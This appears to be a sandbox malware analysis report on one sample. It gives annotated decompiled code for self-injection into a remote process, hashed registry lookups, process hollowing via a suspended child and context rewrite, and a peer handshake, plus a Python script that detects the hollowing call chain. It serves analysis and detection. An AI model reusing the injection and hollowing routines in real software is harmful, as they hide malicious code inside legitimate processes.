                                                                                                                                  					_t32 = GetModuleHandleA(0);
                                                                                                                                   				// _t32 + 0x3c is e_lfanew; NT headers + 0x50 is OptionalHeader.SizeOfImage (PE32), so _t26 is the size of the current module's own mapped image
                                                                                                                                   				_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
                                                                                                                                   				// 0x1000 = MEM_COMMIT, 4 = PAGE_READWRITE: local staging buffer of SizeOfImage bytes
                                                                                                                                   				_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // executed
                                                                                                                                  					_v8 = _t15;
                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                  						L5:
                                                                                                                                  						_t16 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						E0040EE08(_t15, _t32, _t26);
                                                                                                                                   				// 0x40 = PAGE_EXECUTE_READWRITE: an RWX region of SizeOfImage bytes in the target process (_a8); a strong telemetry indicator when paired with the WriteProcessMemory below
                                                                                                                                   				_t18 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // executed
                                                                                                                                  						_t37 = _t18;
                                                                                                                                  						if(_t37 == 0) {
                                                                                                                                  							goto L5;
                                                                                                                                  						} else {
                                                                                                                                  							E004062B7(_v8, _t37);
                                                                                                                                  							_t20 = WriteProcessMemory(_a8, _t37, _v8, _t26, 0); // executed
                                                                                                                                  							if(_t20 != 0) {
                                                                                                                                  								 *_a16 = _t37;
                                                                                                                                   				// rebase the caller-supplied local address _a4 from the local image base (_t32) to the remote base (_t37)
                                                                                                                                   				 *_a12 = _t37 - _t32 + _a4;
                                                                                                                                  								_t16 = 1;
                                                                                                                                  							} else {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t16;
                                                                                                                                  				} else {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,?), ref: 0040638F
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,?), ref: 004063A9
                                                                                                                                  • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1965334864-0
                                                                                                                                  • Opcode ID: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
                                                                                                                                  • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                                                                  • Opcode Fuzzy Hash: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
                                                                                                                                  • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
                                                                                                                                  				CHAR* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				int* _v24;
                                                                                                                                  				char* _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				int _v36;
                                                                                                                                  				char _v295;
                                                                                                                                  				char _v296;
                                                                                                                                  				char _v556;
                                                                                                                                  				void _v592;
                                                                                                                                  				intOrPtr* _t85;
                                                                                                                                  				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				// Clear the four optional output slots (_a8 .. _a20) before the lookup.
				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104; // MAX_PATH: size of the name buffer handed to RegEnumKeyA
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				// _v32: the target that each subkey name's masked hash is compared against below.
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				// E00402544 yields the registry path string; 0x4122f8 is reused as a scratch string buffer.
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				// 0x80000002 = HKEY_LOCAL_MACHINE, 0x20119 = KEY_READ | KEY_WOW64_64KEY
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					// Walk the subkeys: _v24 is the index, _v556 receives the subkey name.
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41: // next subkey
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						// The plain name is never compared: hash(name) ^ 0x5e5e5e5e must equal the target from E00406DC2.
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x5e5e5e5e) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						// 0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) { // 5 = ERROR_ACCESS_DENIED
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100); // clear the scratch buffer
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							// Access denied: hand the subkey name back through _a16 and stop (E0040EF00 behaves like strcpy here).
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						// Read the value named by the decoded 0xa-byte string into _v296 (_v16 = buffer size in, data size out).
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						// Inline strlen of the subkey name; the value data must be longer than the name.
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						// The value must contain the subkey name, and that match must be followed by a short decoded string (E0040EE95 behaves like strstr).
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						// Extract the executable path from a command-line style value: 0x22 = '"', 0x20 = ' '.
						// A quoted value loses its leading quote and is cut at the closing one; an unquoted one is cut at the first space.
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295); // shift the string left by one to drop the opening quote
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						// Inline strlen of _a4 ...
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						// ... and of _v8, so that the tail of _a4 can be compared against _v8.
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							// Terminate the path at _v28, take the basename after the last '\\' (0x5c), hash it, then restore the '.' (0x2e).
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x5e5e5e5e;
								_t163 = _t194 >> 0x00000008 & 0x000000ff; // second byte of the masked basename hash
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								// Accept only if the second byte is within 0x2e of 0x51 and the low byte is below 0x10.
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									// Does the referenced file exist? The answer is returned through _a12.
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									// _a16 receives the directory part of the path, _a20 the basename.
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
                                                                                                                                  							goto L64;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t93 = RegCloseKey(_v20);
                                                                                                                                  					L66:
                                                                                                                                  					return _t93 | 0xffffffff;
                                                                                                                                  				}
                                                                                                                                  			}
[Instruction-address column of the decompiler listing for this function, one entry per source line, covering 0x004073ff to 0x00407801; entries of 0x00000000 carry no address. The column is shown here detached from the source lines it was aligned with, so only the address range is preserved.]

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,761B43E0,00000000), ref: 00407472
                                                                                                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004074F0
                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,761B43E0,00000000), ref: 00407528
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,761B43E0,00000000), ref: 004076E7
                                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 00407717
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,761B43E0,00000000), ref: 00407745
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,761B43E0,00000000), ref: 004077EF
                                                                                                                                    • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 004077E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: "
                                                                                                                                  • API String ID: 3433985886-123907689
                                                                                                                                  • Opcode ID: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
                                                                                                                                  • Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
                                                                                                                                  • Opcode Fuzzy Hash: f1bdd205be3518b321dbe0f69f041738494d7e4aaaefcefb02a6695f8730bb92
                                                                                                                                  • Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks and edges (recovered from the graph data): 40977c-4097b9 CreateProcessA; on success to 4097c2-4097f3 GetThreadContext, on failure to 4097bb-4097bd (return 0). 4097c2-4097f3 on success to 409801-40981c call 40637c, on failure to 4097f5. 409801-40981c on success to 40981e-409839 WriteProcessMemory, on failure to 4097f6-4097ff TerminateProcess. 40981e-409839 on success to 40983b-409856 SetThreadContext, on failure to 4097f5. 40983b-409856 on success to 409858-409863 ResumeThread, on failure to 4097f5. 4097f5 leads to 4097f6-4097ff TerminateProcess, which leads to 4097bb-4097bd. Both 4097bb-4097bd and 409858-409863 end in 409864-409866 (function exit).
                                                                                                                                  C-Code - Quality: 84%
			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;                       /* image base returned by E0040637C, written into the child's PEB */
				char _v28;                       /* entry point returned by E0040637C, becomes the child's EAX */
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t46;
				int _t26;
				int _t30;
				void* _t33;
				int _t39;
				int _t42;

				_t46 = __ecx;                                                                       /* 0x0040977c */
				E0040EE2A(__ecx,  &_v96, 0, 0x44);                                                  /* 0x0040978f  memset(&si, 0, sizeof(STARTUPINFOA)) */
				_v96.cb = 0x44;                                                                     /* 0x004097a9 */
				/* dwCreationFlags = 4 = CREATE_SUSPENDED: _a4 is the command line of the host process;
				   its main thread is created but never executes the original image. */
				_t26 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20); // executed        /* 0x004097b1 */
				if(_t26 != 0) {                                                                     /* 0x004097b9 */
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);                                             /* 0x004097cf  memset(&ctx, 0, sizeof(CONTEXT)) */
					_v812.ContextFlags = 0x10002;                                                   /* 0x004097e1  CONTEXT_i386 | CONTEXT_INTEGER: EAX and EBX are wanted */
					_t30 = GetThreadContext(_v20.hThread,  &_v812); // executed                     /* 0x004097eb */
					if(_t30 != 0) {                                                                 /* 0x004097f3 */
						/* E0040637C is not shown here; from its use it maps the image at _entry_ into the
						   suspended child and returns the image's entry point (_v28) and base (_v24). */
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24); // executed       /* 0x00409811 */
						if(_t33 == 0) {                                                             /* 0x0040981c */
							goto L3;
						}
						/* In a freshly created suspended 32-bit process EBX holds the PEB address and
						   PEB+8 is ImageBaseAddress; overwriting it makes the loader treat the injected
						   image as the process image. The trailing 0 is lpNumberOfBytesWritten = NULL
						   (the _push(0) in the raw listing). */
						_t39 = WriteProcessMemory(_v20.hProcess, _v812.Ebx + 8,  &_v24, 4, 0); // executed   /* 0x00409831 */
						if(_t39 == 0) {                                                             /* 0x00409839 */
							goto L3;
						}
						_v812.Eax = _v28;                                                           /* 0x0040983e  EAX = entry point of the injected image */
						_t42 = SetThreadContext(_v20.hThread,  &_v812); // executed                 /* 0x0040984e */
						if(_t42 == 0) {                                                             /* 0x00409856 */
							goto L3;
						}
						ResumeThread(_v20.hThread); // executed                                     /* 0x0040985b  payload now runs under the host process name */
						return 1;                                                                   /* 0x00409863 */
					}
					L3:                                                                             /* 0x004097f5 */
					/* every failure after CreateProcessA kills the suspended child; exit code 0 */
					TerminateProcess(_v20.hProcess, 0);                                             /* 0x004097f9 */
				}
				L1:                                                                                 /* 0x004097bb */
				return 0;
			}

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
                                                                                                                                  • GetThreadContext.KERNELBASE(?,?,?,?,?,?,?,004122F8), ref: 004097EB
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
                                                                                                                                  • SetThreadContext.KERNELBASE(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
                                                                                                                                  • ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
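The six API references above are the textbook process-hollowing chain. As an added example (not part of the Joe Sandbox report and not code from the sample), the following Python scans report-style API lines for that chain: a CreateProcess* call whose dwCreationFlags (sixth argument) carries CREATE_SUSPENDED (0x4), followed in order by GetThreadContext, WriteProcessMemory, SetThreadContext and ResumeThread. Both traces embedded in it are constructed test input: the first is copied from the list above, the second is a benign CreateProcess without the flag. The line format it parses is assumed from the lines on this page, not from a Joe Sandbox specification.

```python
import re

# Constructed input: the API lines of E0040977C as printed in the report above.
HOLLOWING_TRACE = """\
• CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
• GetThreadContext.KERNELBASE(?,?,?,?,?,?,?,004122F8), ref: 004097EB
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
• WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
• SetThreadContext.KERNELBASE(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
• ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
"""

# Constructed input: a CreateProcess without CREATE_SUSPENDED and no context tampering.
BENIGN_TRACE = """\
• CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401000
• WaitForSingleObject.KERNEL32(?,FFFFFFFF), ref: 00401020
"""

# "• Api.Module(arg,arg,...), ref: ADDRESS" (assumed format, taken from the lines above)
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

CREATE_SUSPENDED = 0x4
# The calls that must follow the suspended CreateProcess, in this order.
CHAIN = ("GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread")


def parse_api_lines(text):
    """Yield (api_name, [args as printed], ref_address) for every API line in text."""
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")]
        yield m.group("api"), args, int(m.group("ref"), 16)


def _hex_arg(args, idx):
    """Argument idx as an int, or None when the sandbox printed '?' or it is missing."""
    if idx < len(args) and args[idx] != "?":
        try:
            return int(args[idx], 16)
        except ValueError:
            return None
    return None


def find_hollowing(text):
    """Return the ref addresses of a CreateProcess(CREATE_SUSPENDED) -> GetThreadContext ->
    WriteProcessMemory -> SetThreadContext -> ResumeThread chain, or None if absent."""
    calls = list(parse_api_lines(text))
    for start, (api, args, ref) in enumerate(calls):
        if not api.startswith("CreateProcess"):
            continue
        flags = _hex_arg(args, 5)  # dwCreationFlags is the sixth argument
        if flags is None or not flags & CREATE_SUSPENDED:
            continue
        refs = [ref]
        pos = start + 1
        for wanted in CHAIN:
            # Unrelated calls (TerminateProcess on the failure path here) may sit in between.
            while pos < len(calls) and calls[pos][0] != wanted:
                pos += 1
            if pos == len(calls):
                break
            refs.append(calls[pos][2])
            pos += 1
        else:
            return refs
    return None


if __name__ == "__main__":
    print("hollowing chain at", [hex(r) for r in find_hollowing(HOLLOWING_TRACE) or []])
    print("benign trace:", find_hollowing(BENIGN_TRACE))
```

The flag check matters: GetThreadContext/SetThreadContext also occur in debuggers and some legitimate injectors, but a CreateProcess with CREATE_SUSPENDED followed by a WriteProcessMemory and a context rewrite before the first ResumeThread is what distinguishes hollowing, which is why the rule keys on argument six rather than on the API names alone.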
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 2981417381-2746444292
                                                                                                                                  • Opcode ID: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                                                                  • Opcode Fuzzy Hash: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404280(void* __ecx, intOrPtr _a4) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				unsigned int _v12;
                                                                                                                                  				unsigned int _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				signed int _t35;
                                                                                                                                  				signed int _t38;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				signed int _t40;
                                                                                                                                  				void* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t73;
                                                                                                                                  				intOrPtr* _t74;
                                                                                                                                  
				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);                            /* manual-reset event, initially signalled; handed to every send/recv helper below */
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);              /* obtain the transport handle into _v20 (socket or pipe; not resolved in this listing) */
					if(_t38 == 0) {
						L11:
						_t39 = FindCloseChangeNotification(_v8); // executed    /* resolves to the same kernel32 export as CloseHandle: releases the event */
						_t40 = _t39 | 0xffffffff;
						L12:
						return _t40;                                        /* -1 on every failure path */
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {                                      /* INVALID_HANDLE_VALUE */
						goto L12;
					}
					_v16 = E0040ECA5();                                     /* 32-bit challenge, presumably random */
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);                 /* send challenge; helpers take (handle, buffer, length, event, 0x7d0 = 2000, presumably a ms timeout) */
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {   /* peer must answer challenge + challenge/4 (mod 2^32) */
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);                          /* apply the same rule to the peer's value and send it back */
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);             /* 8-byte header {1, 1} */
						_t74 = E0040EBCC(_t73);                             /* allocate a 12-byte record */
						 *_t74 = 0x5e;                                      /* record type 0x5e */
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;       /* third field 0 when _a4 is set ... */
							 *0x41215a =  *0x41215a + 1;                    /* ... and a global counter is incremented */
						} else {
							 *(_t74 + 8) = 1;                               /* third field 1 otherwise */
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);            /* send the record; the listing passes _v24 (set to 1 above) as the length */
						E0040EC2E(_t74);                                    /* free the record */
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);             /* read a 4-byte status that is never checked */
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;                       /* return 1 when _a4 == 0, else 0 */
						goto L12;
					}
				}
				return _t35 | 0xffffffff;                                   /* CreateEventA failed: -1 */
			}

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                                                                  • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                                                                  • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1371578007-0
                                                                                                                                  • Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                                                                  • Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
                                                                                                                                  • Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                                                                  • Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                  control_flow_graph 438 40ec54-40ec8f GetSystemTimeAsFileTime GetVolumeInformationA
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040EC54() {
                                                                                                                                  				long _v8;
                                                                                                                                  				struct _FILETIME _v16;
                                                                                                                                  				signed int _t11;
                                                                                                                                  
				GetSystemTimeAsFileTime( &_v16); // current UTC time as a FILETIME
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed; serial number of the current drive root into _v8, return value not checked
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff; // uptime, time high dword and volume serial folded into a 31-bit value
				 *0x4136cc = _t11; // kept in a global for later use
				return _t11;
			}

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
